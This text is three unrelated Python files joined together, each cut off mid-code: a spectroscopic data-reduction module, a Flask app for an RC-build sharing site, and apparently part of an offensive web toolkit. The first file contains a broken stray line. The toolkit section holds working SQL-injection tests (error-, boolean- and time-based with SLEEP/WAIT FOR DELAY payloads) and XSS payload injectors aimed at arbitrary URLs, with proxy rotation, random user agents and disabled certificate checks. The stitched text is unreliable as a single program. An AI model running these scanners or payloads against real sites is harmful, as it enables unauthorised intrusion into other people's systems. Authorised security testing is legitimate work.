""" Suite to reduce spectroscopic data. subfunctions: calibrate setheaders -- exptime, gain, readnoise, etc. makeflat -- make median flat and noisy pixel map makedark -- make median dark, and estimate noise in each pixel. clean -- clean and replace bad pixels extract trace -- trace spectral orders makeprofile -- compute mean spectral PSF (a spline) for an order fitprofile -- fit given spline-PSF to a spectral cross-section Utilities: pickloc fitPSF """ # 2010-07-02 10:56 IJC: Began the great endeavor. try: from astropy.io import fits as pyfits except: import pyfits import matplotlib.pyplot as plt import numpy as np from scipy import optimize, interpolate import pdb class baseObject: """Empty object container. """ def __init__(self): return ######## # Utilities to add in a separate cohesive package at a later date: from analysis import polyfitr, stdr, binarray, gaussian, egaussian import analysis as an from nsdata import bfixpix ######## # Parameters to put in a GUI: gain = 5 # e-/ADU readnoise = 25 # e- ######### def message(text): """Display a message; for now, with text.""" from sys import stdout print text stdout.flush() def pickloc(ax=None, zoom=10): """ :INPUTS: ax : (axes instance) -- axes in which to pick a location zoom : int -- zoom radius for target confirmation : 2-tuple -- (x,y) radii for zoom confirmation. """ # 2011-04-29 19:26 IJC: # 2011-09-03 20:59 IJMC: Zoom can now be a tuple; x,y not cast as int. pickedloc = False if ax is None: ax = plt.gca() axlimits = ax.axis() if hasattr(zoom, '__iter__') and len(zoom)>1: xzoom, yzoom = zoom else: xzoom = zoom yzoom = zoom while not pickedloc: ax.set_title("click to select location") ax.axis(axlimits) x = None while x is None: selectevent = plt.ginput(n=1,show_clicks=False) if len(selectevent)>0: # Prevent user from cancelling out. x,y = selectevent[0] #x = x.astype(int) #y = y.astype(int) if zoom is not None: ax.axis([x-xzoom,x+xzoom,y-yzoom,y+yzoom]) ax.set_title("you selected xy=(%i,%i)\nclick again to confirm, or press Enter/Return to try again" %(x,y) ) plt.draw() confirmevent = plt.ginput(n=1,show_clicks=False) if len(confirmevent)>0: pickedloc = True loc = confirmevent[0] return loc def fitTophat(vec, err=None, verbose=False, guess=None): """Fit a 1D tophat function to an input data vector. Return the fit, and uncertainty estimates on that fit. SEE ALSO: :func:`analysis.gaussian`""" xtemp = np.arange(1.0*len(vec)) if guess is None: # Make some educated guesses as to the parameters: pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1])) area = (vec-pedestal).sum() centroid = (vec*xtemp).sum()/vec.sum() if centroid<0: centroid = 1. elif centroid>len(vec): centroid = len(vec)-2. sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi) if sigma<=0: sigma = 0.01 guess = [area,sigma,centroid,pedestal] if verbose: print 'Gaussian guess parameters>>', guess if err is None: fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2] pc.resfunc fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2] else: fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2] if fitcov is None: # The fitting was really bad! fiterr = np.abs(fit) else: fiterr = np.sqrt(np.diag(fitcov)) if verbose: print 'Best-fit parameters>>', fit f = plt.figure() ax = plt.axes() plt.plot(xtemp, vec, 'o', \ xtemp, gaussian(fit, xtemp), '-', \ xtemp, gaussian(guess, xtemp), '--') return fit, fiterr def fitGaussian(vec, err=None, verbose=False, guess=None): """Fit a Gaussian function to an input data vector. Return the fit, and uncertainty estimates on that fit. SEE ALSO: :func:`analysis.gaussian`""" # 2012-12-20 13:28 IJMC: Make a more robust guess for the centroid. xtemp = np.arange(1.0*len(vec)) if guess is None: # Make some educated guesses as to the parameters: pedestal = (0.8*np.median(vec) + 0.2*(vec[0]+vec[1])) area = (vec-pedestal).sum() centroid = ((vec-pedestal)**2*xtemp).sum()/((vec-pedestal)**2).sum() if centroid<0: centroid = 1. elif centroid>len(vec): centroid = len(vec)-2. #pdb.set_trace() sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi) if sigma<=0: sigma = .01 guess = [area,sigma,centroid,pedestal] if err is None: err = np.ones(vec.shape, dtype=float) badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec)) vec[badvals] = np.median(vec[True - badvals]) err[badvals] = vec[True - badvals].max() * 1e9 if verbose: print 'Gaussian guess parameters>>', guess if not np.isfinite(xtemp).all(): pdb.set_trace() if not np.isfinite(vec).all(): pdb.set_trace() if not np.isfinite(err).all(): pdb.set_trace() try: fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2] except: pdb.set_trace() if fitcov is None: # The fitting was really bad! fiterr = np.abs(fit) else: fiterr = np.sqrt(np.diag(fitcov)) #pdb.set_trace() if verbose: print 'Best-fit parameters>>', fit f = plt.figure() ax = plt.axes() plt.plot(xtemp, vec, 'o', \ xtemp, gaussian(fit, xtemp), '-', \ xtemp, gaussian(guess, xtemp), '--') return fit, fiterr def fitGaussiann(vec, err=None, verbose=False, guess=None, holdfixed=None): """Fit a Gaussian function to an input data vector. Return the fit, and uncertainty estimates on that fit. SEE ALSO: :func:`analysis.gaussian`""" from phasecurves import errfunc from analysis import fmin xtemp = np.arange(1.0*len(vec)) if guess is None: # Make some educated guesses as to the parameters: holdfixed = None pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1])) area = (vec-pedestal).sum() centroid = (vec*xtemp).sum()/vec.sum() if centroid<0: centroid = 1. elif centroid>len(vec): centroid = len(vec)-2. sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi) if sigma<=0: sigma = 0.01 guess = [area,sigma,centroid,pedestal] if err is None: err = np.ones(vec.shape, dtype=float) badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec)) vec[badvals] = np.median(vec[True - badvals]) err[badvals] = vec[True - badvals].max() * 1e9 if verbose: print 'Gaussian guess parameters>>', guess if not np.isfinite(xtemp).all(): pdb.set_trace() if not np.isfinite(vec).all(): pdb.set_trace() if not np.isfinite(err).all(): pdb.set_trace() try: #fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2] fitargs = (gaussian, xtemp, vec, 1./err**2) fit = fmin(errfunc, guess, args=fitargs, full_output=True, disp=False, holdfixed=holdfixed)[0] fitcov = None except: pdb.set_trace() if fitcov is None: # The fitting was really bad! fiterr = np.abs(fit) else: fiterr = np.sqrt(np.diag(fitcov)) if verbose: print 'Best-fit parameters>>', fit f = plt.figure() ax = plt.axes() plt.plot(xtemp, vec, 'o', \ xtemp, gaussian(fit, xtemp), '-', \ xtemp, gaussian(guess, xtemp), '--') return fit, fiterr def fit2Gaussian(vec, err=None, verbose=False, guess=None, holdfixed=None): """Fit two Gaussians simultaneously to an input data vector. :INPUTS: vec : sequence 1D array or list of values to fit to err : sequence uncertainties on vec guess : sequence guess parameters: [area1, sigma1, cen1, area2, sig2, cen2, constant]. Note that parameters are in pixel units. holdfixed : sequence parameters to hold fixed in analysis, _IF_ guess is passed in. SEE ALSO: :func:`analysis.gaussian`, :func:`fitGaussian`""" # 2012-03-14 14:33 IJMC: Created from tools import sumfunc from phasecurves import errfunc from analysis import fmin # Don't use SciPy, because I want keywords! xtemp = np.arange(1.0*len(vec)) if err is None: err = np.ones(xtemp.shape) else: err = np.array(err, copy=False) if guess is None: # Make some semi-educated guesses as to the parameters: holdfixed = None pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1])) area = (vec-pedestal).sum() centroid = (vec*xtemp).sum()/vec.sum() if centroid<0: centroid = 1. elif centroid>len(vec): centroid = len(vec)-2. sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi) if sigma<=0: sigma = 0.01 guess1 = [area/2.,sigma/1.4,centroid+xtemp.size/5.] guess2 = [area/2.,sigma/1.4,centroid-xtemp.size/5.] guess = guess1 + guess2 + [pedestal] ## Testing: #mod = sumfunc(guess, gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,)) #fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), None, vec, 1./err**2) #fitkw = dict(useindepvar=False, testfinite=False) #chisq = errfunc(guess, *fitargs, **fitkw) #thisfit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True) #mod2 = sumfunc(thisfit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,)) if verbose: print '2-Gaussian guess parameters>>', guess fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), vec, 1./err**2) fitkw = dict(useindepvar=False, testfinite=False) fit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True, disp=False, holdfixed=holdfixed) if verbose: model = sumfunc(fit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,)) model1 = gaussian(fit[0][0:3], xtemp) model2 = gaussian(fit[0][3:6], xtemp) print 'Best-fit parameters>>', fit[0] f = plt.figure() ax = plt.axes() plt.plot(xtemp, vec, 'o', \ xtemp, model, '--') plt.plot(xtemp, model1+fit[0][6], ':') plt.plot(xtemp, model2+fit[0][6], ':') return fit[0] def fitPSF(ec, guessLoc, fitwidth=20, verbose=False, sigma=5, medwidth=6, err_ec=None): """ Helper function to fit 1D PSF near a given region. Assumes spectrum runs horizontally across the frame! ec : 2D numpy array echellogram array, with horizontal dispersion direction guessLoc : 2-tuple A slight misnomer for this (x,y) tuple: y is a guess and will be fit, but x is the coordinate at which the fitting takes place. fitwidth : int width of cross-dispersion direction to use in fitting medwidth : int number of columns to average over when fitting a profile verbose : bool verbosity/debugging printout flag sigma : scalar sigma scale for clipping bad values """ # 2010-08-24 22:00 IJC: Added sigma option # 2010-11-29 20:54 IJC: Added medwidth option # 2011-11-26
<filename>application.py<gh_stars>0 # -*- coding: utf-8 -*- from cryptography.fernet import Fernet from flask import Flask, render_template, Response, abort, session, request, url_for, flash, redirect from flask.ext.github import GitHub, GitHubError from flask_sslify import SSLify import elasticsearch import os import os.path import pylru import base64 import copy import requests import json import hmac import math import urllib import urlparse from hashlib import sha1 import collections def update(d, u): for k, v in u.iteritems(): if isinstance(v, collections.Mapping): r = update(d.get(k, {}), v) d[k] = r else: d[k] = u[k] return d # Init the rcbuild.info app. rcbuild = Flask(__name__) sslify = SSLify(rcbuild, skips=["healthz"]) rcbuild.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID'] rcbuild.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET'] rcbuild.config['GITHUB_BASE_URL'] = os.environ['GITHUB_BASE_URL'] rcbuild.config['GITHUB_AUTH_URL'] = os.environ['GITHUB_AUTH_URL'] rcbuild.config['PROPAGATE_EXCEPTIONS'] = True rcbuild.config['PERMANENT_SESSION_LIFETIME'] = 365 * 24 * 60 * 60 rcbuild.secret_key = os.environ['SESSION_SECRET_KEY'] application = rcbuild FERNET_KEY = os.environ['FERNET_KEY'] f = Fernet(FERNET_KEY) es = elasticsearch.Elasticsearch([os.environ['ES_HOST']]) SILENT_COMMIT_MESSAGE = "Silently upgrade - " partCategories_string = "" partCategories = {} buildSkeleton = {} infoSkeleton = {} github_cache = pylru.lrucache(64) from git import Repo github = GitHub(rcbuild) SOCIAL_BOTS = ["facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)", "facebookexternalhit/1.1", "Mozilla/5.0 (compatible; redditbot/1.0; +http://www.reddit.com/feedback)", "Twitterbot", "Pinterest", "Google (+https://developers.google.com/+/web/snippet/)", "Mozilla/5.0 (compatible; Google-Structured-Data-Testing-Tool +http://developers.google.com/structured-data/testing-tool/)"] def is_social_bot(): for bot in SOCIAL_BOTS: if bot in request.user_agent.string: return True return False def CloneOrPull(): r = None if not os.path.isdir("parts-repo"): r = Repo.clone_from("https://github.com/rcbuild-info/parts.git", "parts-repo") else: r = Repo("parts-repo") fetch_info = r.remote().pull() SMALL_PARTS_BY_ID = {} SMALL_PARTS_BY_CATEGORY = {} LINKS = {} def addPart(dest, manufacturerID, partID, part): if manufacturerID not in dest: dest[manufacturerID] = {} dest[manufacturerID][partID] = part def updatePartIndexHelper(): CloneOrPull() new_small_parts_by_id = {} new_small_parts_by_category = {} new_links = {} for dirpath, dirnames, filenames in os.walk("parts-repo"): manufacturerID = dirpath[len("parts-repo/"):] for filename in filenames: if not filename.endswith("json"): continue partID = filename[:-len(".json")] full_path = os.path.join(dirpath, filename) link = False if os.path.islink(full_path): link = True full_path = os.path.realpath(full_path) if not os.path.isfile(full_path): continue split = full_path.split("/") if len(split) == 2: m = split[-2] p = split[-1][:-len(".json")] addPart(new_links, manufacturerID, partID, (m, p[:-len(".json")])) with open(full_path, "r") as f: part = json.load(f) part["id"] = manufacturerID + "/" + partID small_part = {"manufacturer": part["manufacturer"], "name": part["name"]} if link: small_part["link"] = True categories = [] if "version" in part: categories = part["categories"] elif part["category"]: categories = [part["category"]] small_part["categories"] = categories for category in categories: if category not in new_small_parts_by_category: new_small_parts_by_category[category] = {} addPart(new_small_parts_by_category[category], manufacturerID, partID, small_part) addPart(new_small_parts_by_id, manufacturerID, partID, small_part) global SMALL_PARTS_BY_CATEGORY global SMALL_PARTS_BY_ID global LINKS SMALL_PARTS_BY_CATEGORY = new_small_parts_by_category SMALL_PARTS_BY_ID = new_small_parts_by_id LINKS = new_links @rcbuild.route('/update/partIndex', methods=["GET", "HEAD", "OPTIONS", "POST"]) def updatePartIndex(): # Don't update if we can't validate the requester. if request.method == "GET": github_response = github.request("GET", "user") if github_response["id"] != 52649: abort(403) elif request.method == "POST": h = hmac.new(os.environ['GITHUB_PART_HOOK_HMAC'], request.data, sha1) if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()): abort(403) updatePartIndexHelper() return 'ok' @rcbuild.route('/partIndex/by/<by>.json') def partIndex(by): if by == "category": return Response(json.dumps(SMALL_PARTS_BY_CATEGORY), content_type="application/json") elif by == "id": return Response(json.dumps(SMALL_PARTS_BY_ID), content_type="application/json") abort(404) @rcbuild.route('/') def index(): return render_template('main.html') @rcbuild.route('/update/buildIndex', methods=["GET", "HEAD", "OPTIONS", "POST"]) def updateBuildIndex(): # Don't update if we can't validate the requester. if request.method == "POST": request_data = request.get_data() push_info = json.loads(request_data) if "name" not in push_info["repository"]["owner"]: print("owner missing name") print(push_info["repository"]) abort(403) user = push_info["repository"]["owner"]["name"] res = es.get(index='private', doc_type='githubsecret', id=user) if not res["found"]: print("couldn't find github secret") abort(403) h = hmac.new(str(res["_source"]["secret"]), request.data, sha1) if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()): print("couldn't verify hmac") abort(403) branch = push_info["ref"][len("refs/heads/"):] if user == "tannewt" and branch.startswith(("test", "Test")): return Response('ok') if branch.startswith("patch"): return Response('ok') # Ignore the push notification we get when a new branch is created. if push_info["before"] == "0000000000000000000000000000000000000000" or len(push_info["commits"]) == 0: print("Dropping notification of creation of " + push_info["ref"] + " in " + push_info["repository"]["full_name"]) return Response('ok') res = None try: res = es.get(index='builds', doc_type='buildsnapshot', id=push_info["before"]) except elasticsearch.TransportError as e: print("elastic search error fetching current", e, push_info["before"]) pass current_snapshot = None current_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": push_info["before"]} updating = False if res and res["found"]: current_snapshot = res["_source"] updating = True previous_snapshot = None previous_doc_id = None # We do a bulk update to the index to minimize update cost. actions = [] for commit in push_info["commits"]: # We bump the snapshot if settings or parts change but not other things # such as flights. Flights will only impact snapshot stats, not structure. if (current_snapshot == None or ("build.json" in commit["modified"] and not commit["message"].startswith(SILENT_COMMIT_MESSAGE)) or "cleanflight_cli_dump.txt" in commit["modified"] or "cleanflight_gui_backup.txt" in commit["modified"] or "cleanflight_cli_dump.txt" in commit["added"] or "cleanflight_gui_backup.txt" in commit["added"]): # Finalize the previous snapshot. if previous_snapshot: actions.append({"index": previous_doc_id}) actions.append(previous_snapshot) previous_snapshot = current_snapshot previous_doc_id = copy.copy(current_doc_id) if previous_snapshot: previous_snapshot["next_snapshot"] = commit["id"] # Create a new snapshot. current_snapshot = { "timestamp": commit["timestamp"], "user": user, "branch": branch, "previous_snapshot": previous_doc_id["_id"], "commits": [], "next_snapshot": None } elif updating: # The id of a snapshot is the last commit so we delete the old current # doc when a commit is added and load the previous snapshot so we can # update its next. actions.append({"delete": copy.copy(current_doc_id)}) if "previous_snapshot" in current_snapshot: previous_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": current_snapshot["previous_snapshot"]} res = None try: res = es.get(index='builds', doc_type='buildsnapshot', id=previous_doc_id["_id"]) except elasticsearch.TransportError as e: print("elastic search error fetching previous", e, previous_doc_id) pass if res and res["found"]: previous_snapshot = res["_source"] else: previous_doc_id = None if previous_snapshot: previous_snapshot["next_snapshot"] = commit["id"] if current_snapshot: if "build" not in current_snapshot or "build.json" in commit["modified"] or "build.json" in commit["added"]: r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"}) if r.status_code == requests.codes.ok: current_snapshot["build"] = json.loads(r.text) # Update to the latest info. if "info" not in current_snapshot or "info.json" in commit["modified"] or "info.json" in commit["added"]: r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/info.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"}) if r.status_code == requests.codes.ok: current_snapshot["info"] = json.loads(r.text) current_snapshot["commits"].append(commit["id"]) if not commit["message"].startswith(SILENT_COMMIT_MESSAGE): current_snapshot["timestamp"] = commit["timestamp"] current_doc_id["_id"] = commit["id"] updating = False if previous_snapshot: actions.append({"index": previous_doc_id}) actions.append(previous_snapshot) if current_snapshot: actions.append({"index": current_doc_id}) actions.append(current_snapshot) es.bulk(index='builds', doc_type='buildsnapshot', body=actions) return Response('ok') def filtered_shoulds(f, shoulds, size=5, sort=None, from_=0): query = {"query": {"filtered": {"filter": f, "query": {"bool": {"should": shoulds}}}}, "size": size, "from": from_} if sort: query["sort"] = sort return query @rcbuild.route('/similar/builds/<user>/<branch>') def similar_builds(user, branch): ref = None if "commit" in request.args: ref = request.args["commit"] else: ref = "refs/heads/" + urllib.quote_plus(branch.encode('utf8')) build = get_github("repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + ref, {"accept": "application/vnd.github.v3.raw"}, use_cache_even_when_logged_in=True) if build.status_code != requests.codes.ok: return Response(status=requests.codes.server_error) build = json.loads(build.get_data(True)) not_this_build = {"bool": {"must": [{"term": {"user": user}}, {"term": {"branch": branch}}]}} shoulds = [] for category in build["config"]: t = "term" term = {category: {"value": build["config"][category]}} if isinstance(build["config"][category], list): t = "terms" term = {category: build["config"][category]} if category in partCategories["categories"] and "similarBoost" in partCategories["categories"][category]: if t == "term": term[category]["boost"] = partCategories["categories"][category]["similarBoost"] else: term["boost"] = partCategories["categories"][category]["similarBoost"] shoulds.append({t: term}) searches = [] other_musts = {"missing": {"field": "next_snapshot"}} other_size = 10 if "u" in request.cookies: searches.append({"index": "builds", "doc_type": "buildsnapshot"}) f = {"bool": {"must": [{"missing": {"field": "next_snapshot"}}, {"term": {"user": request.cookies["u"]}}], "must_not" : not_this_build }} other_musts = [other_musts, {"not": {"term": {"user": request.cookies["u"]}}}] searches.append(filtered_shoulds(f, shoulds)) other_size = 5 searches.append({"index": "builds", "doc_type": "buildsnapshot"}) f = {"bool": {"must": other_musts, "must_not" : not_this_build }} searches.append(filtered_shoulds(f, shoulds, size=other_size)) res = es.msearch(body=searches) response = {} if len(res["responses"]) > 1: response["yours"] = [] for hit in res["responses"][0]["hits"]["hits"]: hit = hit["_source"] response["yours"].append({"user": hit["user"], "branch": hit["branch"]}) response["others"] = [] for hit in res["responses"][len(res["responses"]) - 1]["hits"]["hits"]: hit = hit["_source"] response["others"].append({"user": hit["user"], "branch": hit["branch"]}) return Response(json.dumps(response)) def get_part(partID): if "/" not in partID: return None split = partID.rsplit("/", 1) manufacturerID = split[0] partID = split[1] while manufacturerID in LINKS and partID in LINKS[manufacturerID]: manufacturerID = LINKS[manufacturerID][partID][0] partID = LINKS[manufacturerID][partID][1] if manufacturerID in SMALL_PARTS_BY_ID and partID in SMALL_PARTS_BY_ID[manufacturerID]: return SMALL_PARTS_BY_ID[manufacturerID][partID] return None def get_part_name(partID): part = get_part(partID) if part: return part["manufacturer"] + " " + part["name"] return partID def get_build_snippet(build): parts = ["frame", "motor", "esc", "fc"] parts = [get_part_name(build["build"]["config"][x]) for x in parts] part_snippet = u" · ".join([x for x in parts if x != ""]) snippet = {"user" : build["user"], "branch" : build["branch"], "snippet": part_snippet} if "info" in build and "media" in build["info"]: if len(build["info"]["media"]["photos"]) > 0 and not (len(build["info"]["media"]["photos"]) == 1 and build["info"]["media"]["photos"][0]["imgur"]["imageId"] == ""): snippet["thumb"] = build["info"]["media"]["photos"][-1] elif len(build["info"]["media"]["videos"]) > 0 and not (len(build["info"]["media"]["videos"]) == 1 and build["info"]["media"]["videos"][0]["youtube"]["videoId"] == ""): snippet["thumb"] = build["info"]["media"]["videos"][-1] return snippet @rcbuild.route('/list/builds', defaults={"page": 1}, methods=["GET", "HEAD", "OPTIONS", "POST"]) @rcbuild.route('/list/builds/<page>', methods=["GET", "HEAD", "OPTIONS", "POST"]) def list_builds(page): if request.method != "POST": return Response(status=requests.codes.method_not_allowed) partIDs = json.loads(request.data) shoulds = [] for partID in partIDs: part = get_part(partID) categories = part["categories"] if len(categories) == 0: categories = partCategories["categories"] for c in
#coding: utf-8 import subprocess,os,xtelnet import requests,socket,random,time,ssl import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import bs4 from bs4 import BeautifulSoup from bane.payloads import * from bane.pager import inputs def sqli_error_based(u,logs=True,user_agent=None,returning=False,timeout=10,proxy=None,cookie=None): ''' this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding "'" at the end of the line and check the response body for any SQL syntax errors. it's an "Error Based SQL Injection" test. the function takes 4 arguments: u: the link to check logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False returning: (set by default to: False) returning an integer indecating the result of the test: usage: >>>import bane >>>l='http://www.example.com/product.php?id=2' >>>bane.sqlieb(domain) if returning was set to: True False => not vulnerable True => vulnerable timeout: (set by default to: 10) timeout flag for the request ''' s=False if proxy: proxy={'http':'http://'+proxy} if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} if logs==True: print("[*]Error Based SQL Injection test") try: u+="'" rp= requests.get(u,headers = hea,proxies=proxy,timeout=timeout,verify=False) r=rp.text if (('SQL command not properly ended' in r) or ('Query failed: ERROR: syntax error at or near' in r) or ('Unclosed quotation mark before the character string' in r) or ("You have an error in your SQL syntax" in r) or ("quoted string not properly terminated" in r) or ("mysql_fetch_array(): supplied argument is not a valid MySQL result resource in"in r)): s=True except Exception as e: pass if logs==True: if s==False: print("[-]Not vulnerable") if s==True: print("[+]Vulnerable!!!") if returning==True: return s def sqli_boolean_based(u,logs=True,returning=False,timeout=10,proxy=None,user_agent=None,cookie=None): ''' this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding boolean opertations to the link and check the response body for any change. it's an "Boolean Based SQL Injection" test. the function takes 4 arguments: u: the link to check logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False returning: (set by default to: False) returning an integer indecating the result of the test: usage: >>>import bane >>>l='http://www.example.com/product.php?id=2' >>>bane.sqlibb(domain) if returning was set to: True False => not vulnerable True => vulnerable timeout: (set by default to: 10) timeout flag for the request ''' if proxy: proxy={'http':'http://'+proxy} s=False if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} try: if logs==True: print("[*]Boolean Based SQL Injection test") r=requests.get(u+" and 1=2",headers=hea,proxies=proxy,timeout=timeout, verify=False) q=requests.get(u+" and 1=1",headers=hea,proxies=proxy,timeout=timeout, verify=False) r1=r.text q1=q.text if ((r.status_code==200)and(q.status_code==200)): if ((r1!=q1) and (("not found" not in r1.lower()) and ("not found" not in q1.lower()))): s=True except: pass if logs==True: if s==False: print("[-]Not vulnerable") if s==True: print("[+]Vulnerable!!!") if returning==True: return s def sqli_time_based(u,delay=15,db="mysql",logs=True,returning=False,timeout=25,proxy=None,user_agent=None,cookie=None): ''' this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding a delay statement at the end of the line and check the delay of the response. it's an "Time Based SQL Injection" test. the function takes 5 arguments: u: the link to check delay: time giving as a delay for the database to do before returning the response logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False returning: (set by default to: False) returning an integer indecating the result of the test: usage: >>>import bane >>>l='http://www.example.com/product.php?id=2' >>>bane.sqlitb(domain) if returning was set to: True False => not vulnerable True => vulnerable timeout: (set by default to: 25) timeout flag for the request ''' if proxy: proxy={'http':'http://'+proxy} if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} s=False if db.lower()=="mysql": sle="-SLEEP({})".format(delay) if db.lower()=="sql": sle="; WAIT FOR DELAY '00:00:{}'".format(delay) if db.lower()=="oracle": sle="BEGIN DBMS_LOCK.SLEEP({}); END;".format(delay) else: return None try: if logs==True: print("[*]Time Based SQL Injection test") t=time.time() r=requests.get(u+sle,headers=hea,proxies=proxy,timeout=timeout, verify=False) if ((time.time()-t>=delay)and (r.status_code==200)): s=True except: pass if logs==True: if s==False: print("[-]Not vulnerable") if s==True: print("[+]Vulnerable!!!") if returning==True: return s def xss_get(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None): ''' this function is for xss test with GET requests. it takes the 4 arguments: u: link to test pl: dictionary contains the paramter and the xss payload extra: if the request needs additionnal parameters you can add them there in dictionary format {param : value} timeout: timeout flag for the request ''' if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} if proxy: proxy={'http':'http://'+proxy} for x in pl: xp=pl[x] d={} if extra: d.update(extra) d.update(pl) try: c=requests.get(u, params= pl,headers = hea,proxies=proxy,timeout=timeout, verify=False).text if xp in c: return True except Exception as e: pass return False def xss_post(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None): ''' this function is for xss test with POST requests. it takes the 4 arguments: u: link to test pl: dictionary contains the paramter and the xss payload extra: if the request needs additionnal parameters you can add them there in dictionary format {param : value} timeout: timeout flag for the request ''' if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: hea={'User-Agent': us} if proxy: proxy={'http':'http://'+proxy} for x in pl: xp=pl[x] d={} if extra: d.update(extra) d.update(pl) try: c=requests.post(u, data= d,headers = hea,proxies=proxy,timeout=timeout, verify=False).text if xp in c: return True except Exception as e: pass return False def xss(u,payload=None,fresh=False,get=True,post=True,logs=True,returning=False,proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None): ''' this function is for xss test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods. it takes the following arguments: u: link to test payload: the xss payload to use it, if it's set to: None (set by default to: None) it uses the default payload get: (set by default to: True) to test the parameter using GET post: (set by default to: True) to test the parameter using POST logs: (set by default to: True) show the process returning: (set by dfault to: False) to return scan results of the parameters as list of strings usage: >>>import bane >>>bane.xss('http://www.example.com/") >>>bane.xss('http://www.example.com/',payload="<script>alert(123);</script>") ''' global stop stop=False if proxy: proxy=proxy if proxies: proxy=random.choice(proxies) lst=[] if payload: xp=payload else: xp='<script>alert("Vulnerable!!!");</script>' if logs==True: print("Getting parameters...") hu=True l1=inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent) if len(l1)==0: if logs==True: print("No parameters were found!!!") hu=False if hu==True: extr=[] l=[] for x in l1: if (x.split(':')[1]!=''): extr.append(x) else: l.append(x) for x in extr: if x.split(':')[0] in l: extr.remove(x) if logs==True: print("Test has started...\nPayload:\n"+xp) if '?' in u: u=u.split('?')[0].split(',')[0] for i in l: if stop==True: break user=None i=i.split(':')[0] try: if proxies: proxy=random.choice(proxies) pl={i : xp} extra={} if len(extr)!=0: for x in extr: a=x.split(':')[0] b=x.split(':')[1] extra.update({a:b}) if get==True: if fresh==True: if stop==True: break extr=[] user=random.choice(ua) k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie) for x in k: if (x.split(':')[1]!=''): extr.append(x) for x in extr: if x.split(':')[0] in l: extr.remove(x) extra={} if len(extr)!=0: for x in extr: a=x.split(':')[0] b=x.split(':')[1] extra.update({a:b}) if stop==True: break if xss_get(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True: x="parameter: "+i+" method: GET=> [+]Payload was found" else: x="parameter: "+i+" method: GET=> [-]Payload was not found" lst.append(x) if logs==True: print (x) if post==True: if fresh==True: if stop==True: break extr=[] user=random.choice(ua) k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie) for x in k: if (x.split(':')[1]!=''): extr.append(x) for x in extr: if x.split(':')[0] in l: extr.remove(x) extra={} if len(extr)!=0: for x in extr: a=x.split(':')[0] b=x.split(':')[1] extra.update({a:b}) if stop==True: break if xss_post(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True: x="parameter: "+i+" method: POST=> [+]Payload was found" else: x="parameter: "+i+" method: POST=> [-]Payload was not found" lst.append(x) if logs==True: print (x) except: break if returning==True: return lst def command_exec_link(u,timeout=10,proxy=None,logs=True,returning=False,user_agent=None,cookie=None): ''' this function is for command execution test using a given link ''' s=False if proxy: proxy={'http':'http://'+proxy} if user_agent: us=user_agent else: us=random.choice(ua) if cookie: hea={'User-Agent': us,'Cookie':cookie} else: 